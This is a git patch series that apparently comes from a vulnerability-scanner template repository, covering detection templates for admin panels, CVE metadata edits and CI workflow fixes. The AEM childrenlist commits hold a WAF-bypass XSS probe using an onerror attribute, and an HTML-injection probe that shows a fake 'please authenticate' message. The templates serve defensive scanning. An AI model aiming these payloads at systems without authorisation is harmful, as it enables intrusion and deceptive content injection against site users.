+id: myLittleAdmin-panel + +info: + name: myLittleAdmin Panel + author: nullfuzz + severity: info + description: | + myLittleAdmin is a third-party tool that you can use to manipulate MS SQL databases. + reference: + - http://mylittleadmin.com/en/overview.aspx + metadata: + verified: true + shodan-query: http.html:"myLittleAdmin" + tags: panel,myLittleAdmin + +requests: + - method: GET + path: + - "{{BaseURL}}/" + - "{{BaseURL}}/mylittleadmin/" + + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "contains(body, 'myLittleAdmin for SQL Server')" + condition: and \ No newline at end of file From f38ee97a345969c8da9ceeec7c157e71b460b760 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 16 Jan 2023 13:37:20 +0530 Subject: [PATCH 0927/1133] added waf bypass html payload --- misconfiguration/aem/aem-childrenlist-xss.yaml | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/misconfiguration/aem/aem-childrenlist-xss.yaml b/misconfiguration/aem/aem-childrenlist-xss.yaml index ad7cbc4785..74e152d719 100644 --- a/misconfiguration/aem/aem-childrenlist-xss.yaml +++ b/misconfiguration/aem/aem-childrenlist-xss.yaml @@ -1,7 +1,7 @@ id: aem-xss-childlist info: - name: Adobe Experience Manager - Childlist selector Cross-Site Scripting + name: Adobe Experience Manager 'Childlist selector' - Cross-Site Scripting author: theabhinavgaur severity: medium description: | @@ -17,7 +17,8 @@ info: requests: - method: GET path: - - "{{BaseURL}}/{{rand_base(4)}}{{rand_base(5)}}<img src=x data'a'onerror=alert(domain)>.childrenlist.html" + - "{{BaseURL}}/test<br><br>please%20authenticate<br><br>.childrenlist.html" + - "{{BaseURL}}/test<img src=x data'a'onerror=alert(domain)>.childrenlist.html" matchers-condition: and matchers: @@ -25,8 +26,13 @@ requests: part: body words: - '<img src="x" data onerror="alert(domain)"/>' + - '<br /><br />please authenticate<br /><br />' + condition: or + + - type: word + part: body + words: - 'data-coral-columnview-id' - condition: and - type: word part: content_type @@ -35,4 +41,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 5f8b0ef57d09afa8176bf8b03d9e9cd5f2867060 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 16 Jan 2023 16:06:39 +0530 Subject: [PATCH 0928/1133] Update openapi.yaml --- exposures/apis/openapi.yaml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/exposures/apis/openapi.yaml b/exposures/apis/openapi.yaml index 5348998d50..a2dfe39728 100644 --- a/exposures/apis/openapi.yaml +++ b/exposures/apis/openapi.yaml @@ -10,22 +10,22 @@ requests: - method: GET path: - "{{BaseURL}}/openapi.json" - - "{{BaseURL}}/swagger.json" matchers-condition: and matchers: - - type: word - words: - - application/openapi+json - - application/json - part: header - - type: word words: - openapi - paths condition: and + - type: word + part: header + words: + - application/openapi+json + - application/json + condition: or + - type: status status: - 200 From 783d20280b0a1f03966990de450da2e044a02ae2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 16 Jan 2023 16:13:45 +0530 Subject: [PATCH 0929/1133] added classification --- cves/2022/CVE-2022-47945.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2022/CVE-2022-47945.yaml b/cves/2022/CVE-2022-47945.yaml index a5bbe1362f..8773b830d8 100644 --- a/cves/2022/CVE-2022-47945.yaml +++ b/cves/2022/CVE-2022-47945.yaml @@ -9,6 +9,8 @@ info: reference: - https://tttang.com/archive/1865/ - https://nvd.nist.gov/vuln/detail/CVE-2022-47945 + classification: + cve-id: CVE-2022-47945 metadata: verified: true shodan-query: title:"Thinkphp" From 986d78fe6a6b5ce7e0dfe31470808b45fb872fbb Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 16 Jan 2023 16:21:02 +0530 Subject: [PATCH 0930/1133] workflow fix --- .github/workflows/cve-annotate.yml | 2 -- .github/workflows/template-validate.yml | 3 +-- 2 files changed, 1 insertion(+), 4 deletions(-) diff --git a/.github/workflows/cve-annotate.yml b/.github/workflows/cve-annotate.yml index 44624a9aac..1ef8b782cc 100644 --- a/.github/workflows/cve-annotate.yml +++ b/.github/workflows/cve-annotate.yml @@ -20,8 +20,6 @@ jobs: uses: actions/setup-go@v3 with: go-version: 1.19 - check-latest: true - cache: true - name: cve-annotate install run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@latest diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 346d0857ae..9f29054817 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -4,6 +4,7 @@ on: pull_request: paths: - '**.yaml' + workflow_dispatch: jobs: build: @@ -17,8 +18,6 @@ jobs: uses: actions/setup-go@v3 with: go-version: 1.19 - check-latest: true - cache: true - name: nuclei install run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest From 8eb821314d23d4b439ed11303cc1eefea5f011c0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 16 Jan 2023 16:30:21 +0530 Subject: [PATCH 0931/1133] Create saltgui-panel.yaml --- exposed-panels/saltgui-panel.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/saltgui-panel.yaml diff --git a/exposed-panels/saltgui-panel.yaml b/exposed-panels/saltgui-panel.yaml new file mode 100644 index 0000000000..1d8b9300bb --- /dev/null +++ b/exposed-panels/saltgui-panel.yaml @@ -0,0 +1,26 @@ +id: saltgui-panel + +info: + name: SaltGUI Panel Detect + author: ritikchaddha + severity: info + tags: panel,saltgui + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<title>SaltGUI' + + - type: status + status: + - 200 From b363e2db9994f1fa4929a754ec4b67f7bb759ba8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 16 Jan 2023 22:32:54 +0530 Subject: [PATCH 0932/1133] base-url --- exposed-panels/saltgui-panel.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/exposed-panels/saltgui-panel.yaml b/exposed-panels/saltgui-panel.yaml index 1d8b9300bb..433ac293e3 100644 --- a/exposed-panels/saltgui-panel.yaml +++ b/exposed-panels/saltgui-panel.yaml @@ -7,10 +7,9 @@ info: tags: panel,saltgui requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}} host-redirects: true max-redirects: 2 From e1d884c8f34c45312e9c1798f4d9e6b55387bf60 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 16 Jan 2023 22:33:58 +0530 Subject: [PATCH 0933/1133] " added --- exposed-panels/saltgui-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/saltgui-panel.yaml b/exposed-panels/saltgui-panel.yaml index 433ac293e3..d4e7b6f6c4 100644 --- a/exposed-panels/saltgui-panel.yaml +++ b/exposed-panels/saltgui-panel.yaml @@ -9,7 +9,7 @@ info: requests: - method: GET path: - - "{{BaseURL}} + - "{{BaseURL}}" host-redirects: true max-redirects: 2 From f9dc43da50e8d4bd18fcad6e7151611c90d3ddde Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 16 Jan 2023 22:38:19 +0530 Subject: [PATCH 0934/1133] unsafe-added --- exposed-panels/saltgui-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/saltgui-panel.yaml b/exposed-panels/saltgui-panel.yaml index d4e7b6f6c4..82f7a3f7f5 100644 --- a/exposed-panels/saltgui-panel.yaml +++ b/exposed-panels/saltgui-panel.yaml @@ -11,6 +11,7 @@ requests: path: - "{{BaseURL}}" + unsafe: true host-redirects: true max-redirects: 2 matchers-condition: and From b2799a54c031f7a7a2ddb8f9db2aa9975bfea73a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 16 Jan 2023 23:05:08 +0530 Subject: [PATCH 0935/1133] XSS & HTML Injection --- .../aem/aem-childrenlist-xss.yaml | 24 ++++++++----------- 1 file changed, 10 insertions(+), 14 deletions(-) diff --git a/misconfiguration/aem/aem-childrenlist-xss.yaml b/misconfiguration/aem/aem-childrenlist-xss.yaml index 74e152d719..76c4c96c89 100644 --- a/misconfiguration/aem/aem-childrenlist-xss.yaml +++ b/misconfiguration/aem/aem-childrenlist-xss.yaml @@ -17,28 +17,24 @@ info: requests: - method: GET path: - - "{{BaseURL}}/test

please%20authenticate

.childrenlist.html" - - "{{BaseURL}}/test.childrenlist.html" + - "{{BaseURL}}/{{rand_base(4)}}.childrenlist.html" + - "{{BaseURL}}/{{rand_base(4)}}

please%20authenticate

.childrenlist.html" - matchers-condition: and + stop-at-first-match: true + matchers-condition: or matchers: - type: word part: body + name: xss words: - '' - - '

please authenticate

' - condition: or + - 'data-coral-columnview-id' + condition: and - type: word part: body + name: html words: + - '

please authenticate

' - 'data-coral-columnview-id' - - - type: word - part: content_type - words: - - 'text/html' - - - type: status - status: - - 200 + condition: and From 643700ca28631c8267677561fcaf0618af7d7252 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Mon, 16 Jan 2023 12:41:15 -0500 Subject: [PATCH 0936/1133] Dashboard Content Enhancements (#6526) Dashboard Content Enhancements --- cves/2016/CVE-2016-6601.yaml | 6 ++++-- cves/2017/CVE-2017-14186.yaml | 8 +++++--- cves/2018/CVE-2018-17246.yaml | 4 +++- cves/2019/CVE-2019-12616.yaml | 6 ++++-- cves/2019/CVE-2019-14530.yaml | 8 +++++--- cves/2021/CVE-2021-20323.yaml | 6 ++++-- .../2021/CVE-2021-21087.yaml | 2 +- cves/2021/CVE-2021-24227.yaml | 11 +++++------ cves/2021/CVE-2021-24827.yaml | 8 +++++--- cves/2021/CVE-2021-24946.yaml | 6 ++++-- cves/2021/CVE-2021-25099.yaml | 6 ++++-- .../2021/CVE-2021-31195.yaml | 0 cves/2021/CVE-2021-35380.yaml | 6 ++++-- cves/2021/CVE-2021-40661.yaml | 7 +++++-- cves/2021/CVE-2021-43421.yaml | 8 +++++--- cves/2021/CVE-2021-43734.yaml | 6 ++++-- cves/2021/CVE-2021-44451.yaml | 7 +++++-- cves/2022/CVE-2022-0784.yaml | 6 ++++-- cves/2022/CVE-2022-0786.yaml | 6 ++++-- cves/2022/CVE-2022-0826.yaml | 6 ++++-- cves/2022/CVE-2022-0948.yaml | 8 +++++--- cves/2022/CVE-2022-1595.yaml | 6 ++++-- cves/2022/CVE-2022-23854.yaml | 7 +++++-- cves/2022/CVE-2022-26138.yaml | 10 ++++++---- cves/2022/CVE-2022-27593.yaml | 9 +++++---- cves/2022/CVE-2022-2863.yaml | 8 +++++--- cves/2022/CVE-2022-31656.yaml | 7 ++++--- cves/2022/CVE-2022-31793.yaml | 8 ++++---- cves/2022/CVE-2022-34121.yaml | 6 ++++-- cves/2022/CVE-2022-35413.yaml | 7 +++++-- cves/2022/CVE-2022-36642.yaml | 8 +++++--- cves/2022/CVE-2022-37299.yaml | 8 +++++--- cves/2022/CVE-2022-3768.yaml | 10 ++++++---- cves/2022/CVE-2022-38794.yaml | 5 +++-- cves/2022/CVE-2022-4050.yaml | 6 ++++-- cves/2022/CVE-2022-40734.yaml | 6 ++++-- cves/2022/CVE-2022-40881.yaml | 4 +++- cves/2022/CVE-2022-41840.yaml | 8 +++++--- cves/2022/CVE-2022-4260.yaml | 8 +++++--- cves/2022/CVE-2022-46381.yaml | 7 +++++-- default-logins/3com/3com-nj2000-default-login.yaml | 10 ++++++++-- default-logins/aem/aem-felix-console.yaml | 10 ++++++++-- default-logins/apache/karaf-default-login.yaml | 10 ++++++++-- default-logins/apache/ranger-default-login.yaml | 12 ++++++++++-- .../audiocodes/audiocodes-default-login.yaml | 6 ++++-- .../datahub/datahub-metadata-default-login.yaml | 9 ++++++++- default-logins/dataiku/dataiku-default-login.yaml | 10 ++++++++-- default-logins/hybris/hybris-default-login.yaml | 5 ++++- default-logins/kanboard-default-login.yaml | 10 ++++++++-- default-logins/kettle/kettle-default-login.yaml | 9 ++++++++- default-logins/lutron/lutron-default-login.yaml | 9 ++++++++- default-logins/mobotix/mobotix-default-login.yaml | 6 ++++-- default-logins/nsicg/nsicg-default-login.yaml | 10 ++++++++-- .../oracle/peoplesoft-default-login.yaml | 6 ++++-- .../others/kingsoft-v8-default-login.yaml | 9 ++++++++- default-logins/others/opencats-default-login.yaml | 6 ++++-- .../phpmyadmin/phpmyadmin-default-login.yaml | 11 ++++++++--- default-logins/prtg/prtg-default-login.yaml | 6 ++++-- .../ruckus/ruckus-wireless-default-login.yaml | 13 ++++++++++--- .../samsung/samsung-printer-default-login.yaml | 10 ++++++++-- .../tiny-file-manager-default-login.yaml | 10 ++++++++-- default-logins/tooljet/tooljet-default-login.yaml | 10 ++++++++-- .../versa/versa-flexvnf-default-login.yaml | 9 ++++++++- default-logins/xnat/xnat-default-login.yaml | 10 ++++++++-- default-logins/xui-weak-login.yaml | 6 ++++-- exposed-panels/atlantis-detect.yaml | 9 ++++++++- exposed-panels/cacti-panel.yaml | 12 ++++++++++-- exposed-panels/checkmk-login.yaml | 9 ++++++++- exposed-panels/e-mobile-panel.yaml | 9 ++++++++- exposed-panels/edgeos-login.yaml | 9 ++++++++- exposed-panels/fatpipe-ipvpn-panel.yaml | 8 +++++++- exposed-panels/ictprotege-login-panel.yaml | 8 +++++++- exposed-panels/kanboard-login.yaml | 8 ++++++-- exposed-panels/lenovo-fp-panel.yaml | 9 ++++++++- exposed-panels/luci-login-detection.yaml | 10 ++++++++-- exposed-panels/mpftvc-admin-panel.yaml | 9 ++++++++- exposed-panels/netsparker-panel.yaml | 10 ++++++++-- exposed-panels/ocomon-panel.yaml | 8 +++++++- exposed-panels/opengear-panel.yaml | 8 +++++++- exposed-panels/redhat/redhat-satellite-panel.yaml | 8 +++++++- exposed-panels/remedy-axis-login.yaml | 8 +++++++- exposed-panels/ruckus-unleashed-panel.yaml | 10 ++++++++-- exposed-panels/sap-netweaver-portal.yaml | 14 +++++++++++--- exposed-panels/sapfiori-panel.yaml | 12 +++++++++--- exposed-panels/sas-login-panel.yaml | 9 ++++++++- exposed-panels/sauter-login.yaml | 9 ++++++++- exposed-panels/scs-landfill-control.yaml | 10 ++++++++-- exposed-panels/seafile-panel.yaml | 9 ++++++++- exposed-panels/seats-login.yaml | 9 ++++++++- exposed-panels/secmail-detect.yaml | 9 ++++++++- exposed-panels/secnet-ac-panel.yaml | 9 ++++++++- exposed-panels/secure-login-panel.yaml | 9 ++++++++- exposed-panels/securenvoy-panel.yaml | 9 ++++++++- exposed-panels/securepoint-utm.yaml | 9 ++++++++- exposed-panels/securityspy-detect.yaml | 9 ++++++++- exposed-panels/sitecore-login-panel.yaml | 9 ++++++++- exposed-panels/sitecore-login.yaml | 9 ++++++++- exposed-panels/siteomat-login.yaml | 9 ++++++++- exposed-panels/skycaiji-admin-panel.yaml | 9 ++++++++- exposed-panels/slocum-login.yaml | 9 ++++++++- exposed-panels/smartping-dashboard.yaml | 9 ++++++++- exposed-panels/solarview-compact-panel.yaml | 9 ++++++++- exposed-panels/solarwinds-orion.yaml | 9 ++++++++- exposed-panels/solarwinds-servuftp-detect.yaml | 9 ++++++++- exposed-panels/solr-exposure.yaml | 9 ++++++++- exposed-panels/somansa-dlp-detect.yaml | 9 ++++++++- exposed-panels/somfy-login.yaml | 9 ++++++++- exposed-panels/sonarqube-login.yaml | 9 ++++++++- exposed-panels/sonic-wall-application.yaml | 9 ++++++++- exposed-panels/sonicwall-analyzer-login.yaml | 9 ++++++++- exposed-panels/sonicwall-management-panel.yaml | 9 ++++++++- exposed-panels/sonicwall-sslvpn-panel.yaml | 9 ++++++++- exposed-panels/sophos-fw-version-detect.yaml | 9 ++++++++- exposed-panels/sophos-mobile-panel.yaml | 9 ++++++++- exposed-panels/spark-panel.yaml | 9 ++++++++- exposed-panels/sphider-login.yaml | 9 ++++++++- exposed-panels/spiderfoot.yaml | 11 ++++++++--- exposed-panels/splunk-enterprise-panel.yaml | 9 ++++++++- exposed-panels/splunk-login.yaml | 9 ++++++++- exposed-panels/squirrelmail-login.yaml | 9 ++++++++- exposed-panels/sqwebmail-login-panel.yaml | 9 ++++++++- exposed-panels/star-network-utility.yaml | 9 ++++++++- exposed-panels/start-element-manager-panel.yaml | 9 ++++++++- exposed-panels/steve-login-panel.yaml | 10 ++++++++-- exposed-panels/strapi-documentation.yaml | 10 ++++++++-- exposed-panels/strapi-panel.yaml | 9 ++++++++- exposed-panels/stridercd-panel.yaml | 9 ++++++++- exposed-panels/submitty-login.yaml | 9 ++++++++- exposed-panels/subrion-login.yaml | 9 ++++++++- exposed-panels/sugarcrm-panel.yaml | 9 ++++++++- exposed-panels/sungrow-logger1000-detect.yaml | 9 ++++++++- exposed-panels/superadmin-ui-panel.yaml | 9 ++++++++- exposed-panels/supermicro-bmc-panel.yaml | 10 ++++++++-- exposed-panels/superset-login.yaml | 9 ++++++++- exposed-panels/supervpn-panel.yaml | 9 ++++++++- vulnerabilities/apache/apache-solr-file-read.yaml | 4 +++- vulnerabilities/j2ee/liferay-resource-leak.yaml | 10 ++++++++-- vulnerabilities/other/crystal-live-server-lfi.yaml | 9 ++++++++- vulnerabilities/other/kavita-lfi.yaml | 10 ++++++++-- vulnerabilities/other/wapples-firewall-lfi.yaml | 9 ++++++++- vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml | 10 ++++++++-- vulnerabilities/videoxpert-lfi.yaml | 10 ++++++++-- .../webp-server-go/webp-server-go-lfi.yaml | 7 +++++++ vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml | 10 ++++++++-- 144 files changed, 971 insertions(+), 242 deletions(-) rename miscellaneous/unpatched-coldfusion.yaml => cves/2021/CVE-2021-21087.yaml (98%) rename vulnerabilities/other/ms-exchange-server-reflected-xss.yaml => cves/2021/CVE-2021-31195.yaml (100%) diff --git a/cves/2016/CVE-2016-6601.yaml b/cves/2016/CVE-2016-6601.yaml index fe0fe71da5..dd6f63cd03 100644 --- a/cves/2016/CVE-2016-6601.yaml +++ b/cves/2016/CVE-2016-6601.yaml @@ -1,10 +1,10 @@ id: CVE-2016-6601 info: - name: ZOHO WebNMS Framework 5.2 and 5.2 SP1 - Directory Traversal + name: ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion author: 0x_Akoko severity: high - description: Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile + description: ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile. reference: - https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt - https://www.exploit-db.com/exploits/40229/ @@ -30,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2023/01/15 diff --git a/cves/2017/CVE-2017-14186.yaml b/cves/2017/CVE-2017-14186.yaml index aa2d0536b5..a306cd36ff 100644 --- a/cves/2017/CVE-2017-14186.yaml +++ b/cves/2017/CVE-2017-14186.yaml @@ -1,16 +1,16 @@ id: CVE-2017-14186 info: - name: FortiGate SSL VPN Web Portal - Cross Site Scripting + name: FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting author: johnk3r severity: medium description: | - Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack. + FortiGate FortiOS through SSL VPN Web Portal contains a cross-site scripting vulnerability. The login redir parameter is not santized, so an attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks such as a URL redirect. Affected versions are 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and below. reference: - https://www.fortiguard.com/psirt/FG-IR-17-242 - - https://nvd.nist.gov/vuln/detail/CVE-2017-14186 - https://fortiguard.com/advisory/FG-IR-17-242 - https://web.archive.org/web/20210801135714/http://www.securitytracker.com/id/1039891 + - https://nvd.nist.gov/vuln/detail/CVE-2017-14186 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 @@ -40,3 +40,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/11 diff --git a/cves/2018/CVE-2018-17246.yaml b/cves/2018/CVE-2018-17246.yaml index 6d4b2ed289..3412b12722 100644 --- a/cves/2018/CVE-2018-17246.yaml +++ b/cves/2018/CVE-2018-17246.yaml @@ -7,9 +7,9 @@ info: description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. reference: - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md - - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 - https://www.elastic.co/community/security - https://discuss.elastic.co/t/elastic-stack-6-4-3-and-5-6-13-security-update/155594 + - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -41,3 +41,5 @@ requests: part: header words: - "application/json" + +# Enhanced by mp on 2023/01/15 diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml index aa2135bff4..d21e12794c 100644 --- a/cves/2019/CVE-2019-12616.yaml +++ b/cves/2019/CVE-2019-12616.yaml @@ -1,10 +1,10 @@ id: CVE-2019-12616 info: - name: phpMyAdmin < 4.9.0 - CSRF + name: phpMyAdmin <4.9.0 - Cross-Site Request Forgery author: Mohammedsaneem,philippedelteil,daffainfo severity: medium - description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim. + description: phpMyAdmin before 4.9.0 is susceptible to cross-site request forgery. An attacker can utilize a broken tag which points at the victim's phpMyAdmin database, thus leading to potential delivery of a payload, such as a specific INSERT or DELETE statement. reference: - https://www.phpmyadmin.net/security/PMASA-2019-4/ - https://www.exploit-db.com/exploits/46982 @@ -50,3 +50,5 @@ requests: group: 1 regex: - '\?v=([0-9.]+)' + +# Enhanced by md on 2023/01/11 diff --git a/cves/2019/CVE-2019-14530.yaml b/cves/2019/CVE-2019-14530.yaml index 5ae7b41bd8..9036514de2 100644 --- a/cves/2019/CVE-2019-14530.yaml +++ b/cves/2019/CVE-2019-14530.yaml @@ -1,16 +1,16 @@ id: CVE-2019-14530 info: - name: OpenEMR < 5.0.2 - Path Traversal + name: OpenEMR <5.0.2 - Local File Inclusion author: TenBird severity: high description: | - An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. If the requested file is writable for the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server. + OpenEMR before 5.0.2 is vulnerable to local file inclusion via the fileName parameter in custom/ajax_download.php. An attacker can download any file (that is readable by the web server user) from server storage. If the requested file is writable for the web server user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, the file will be deleted from server. reference: - https://www.exploit-db.com/exploits/50037 - https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip - - https://nvd.nist.gov/vuln/detail/CVE-2019-14530 - https://github.com/openemr/openemr/pull/2592 + - https://nvd.nist.gov/vuln/detail/CVE-2019-14530 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 @@ -50,3 +50,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2023/01/15 diff --git a/cves/2021/CVE-2021-20323.yaml b/cves/2021/CVE-2021-20323.yaml index 98a22911c8..b83a77f07d 100644 --- a/cves/2021/CVE-2021-20323.yaml +++ b/cves/2021/CVE-2021-20323.yaml @@ -1,11 +1,11 @@ id: CVE-2021-20323 info: - name: Keycloak < 18.0.0 - Cross Site Scripting + name: Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting author: ndmalc severity: medium description: | - Keycloak before 18.0.0 and after 10.0.0 allows a reflected XSS on client-registrations endpoint. On POST request, when a request is submitted, the application does not sanitize unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as html. This can be performed on any realm present on the Keycloak instance. Currently, due to the bug requiring Content-Type application/json and is submitted via a POST, there is no common path to exploit that have a user impact. + Keycloak 10.0.0 to 18.0.0 contains a cross-site scripting vulnerability via the client-registrations endpoint. On a POST request, the application does not sanitize an unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as HTML. This can be performed on any realm present on the Keycloak instance. Since the bug requires Content-Type application/json and is submitted via a POST, there is no common path to exploit that has a user impact. reference: - https://github.com/keycloak/keycloak/security/advisories/GHSA-m98g-63qj-fp8j - https://bugzilla.redhat.com/show_bug.cgi?id=2013577 @@ -52,3 +52,5 @@ requests: - type: status status: - 400 + +# Enhanced by md on 2023/01/06 diff --git a/miscellaneous/unpatched-coldfusion.yaml b/cves/2021/CVE-2021-21087.yaml similarity index 98% rename from miscellaneous/unpatched-coldfusion.yaml rename to cves/2021/CVE-2021-21087.yaml index 5f34fcb2a2..e93ec309db 100644 --- a/miscellaneous/unpatched-coldfusion.yaml +++ b/cves/2021/CVE-2021-21087.yaml @@ -1,4 +1,4 @@ -id: unpatched-coldfusion +id: CVE-2021-21087 info: name: Adobe ColdFusion - Remote Code Execution diff --git a/cves/2021/CVE-2021-24227.yaml b/cves/2021/CVE-2021-24227.yaml index 342434e30c..aab9264d04 100644 --- a/cves/2021/CVE-2021-24227.yaml +++ b/cves/2021/CVE-2021-24227.yaml @@ -1,18 +1,15 @@ id: CVE-2021-24227 info: - name: Patreon WordPress < 1.7.0 - Unauthenticated Local File Disclosure + name: Patreon WordPress <1.7.0 - Unauthenticated Local File Inclusion author: theamanrawat severity: high - description: The Jetpack Scan team identified a Local File Disclosure vulnerability - in the Patreon WordPress plugin before 1.7.0 that could be abused by anyone visiting - the site. Using this attack vector, an attacker could leak important internal - files like wp-config.php, which contains database credentials and cryptographic - keys used in the generation of nonces and cookies. + description: Patreon WordPress before version 1.7.0 is vulnerable to unauthenticated local file inclusion that could be abused by anyone visiting the site. Exploitation by an attacker could leak important internal files like wp-config.php, which contains database credentials and cryptographic keys used in the generation of nonces and cookies. reference: - https://wpscan.com/vulnerability/f62df02d-7678-440f-84a1-ddbf09364016 - https://wordpress.org/plugins/patreon-connect/ - https://jetpack.com/2021/03/26/vulnerabilities-found-in-patreon-wordpress-plugin/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24227 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -34,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2023/01/15 diff --git a/cves/2021/CVE-2021-24827.yaml b/cves/2021/CVE-2021-24827.yaml index 25d3ebf385..e2582bf98a 100644 --- a/cves/2021/CVE-2021-24827.yaml +++ b/cves/2021/CVE-2021-24827.yaml @@ -1,16 +1,16 @@ id: CVE-2021-24827 info: - name: Asgaros Forum < 1.15.13 - Unauthenticated SQL Injection + name: WordPress Asgaros Forum <1.15.13 - SQL Injection author: theamanrawat severity: critical description: | - The Asgaros Forum WordPress plugin before 1.15.13 does not validate and escape user input when subscribing to a topic before using it in a SQL statement, leading to an unauthenticated SQL injection issue. + WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. reference: - https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1 - https://wordpress.org/plugins/asgaros-forum/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-24827 - https://plugins.trac.wordpress.org/changeset/2611560/asgaros-forum + - https://nvd.nist.gov/vuln/detail/CVE-2021-24827 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -35,3 +35,5 @@ requests: - 'contains(content_type, "text/html")' - 'contains(body, "asgarosforum")' condition: and + +# Enhanced by md on 2023/01/06 diff --git a/cves/2021/CVE-2021-24946.yaml b/cves/2021/CVE-2021-24946.yaml index 2308c11db8..f02a7cddfe 100644 --- a/cves/2021/CVE-2021-24946.yaml +++ b/cves/2021/CVE-2021-24946.yaml @@ -1,11 +1,11 @@ id: CVE-2021-24946 info: - name: Modern Events Calendar < 6.1.5 - Blind SQL Injection + name: WordPress Modern Events Calendar <6.1.5 - Blind SQL Injection author: theamanrawat severity: critical description: | - The plugin does not sanitise and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action, available to unauthenticated users, leading to an unauthenticated SQL injection issue. + WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, 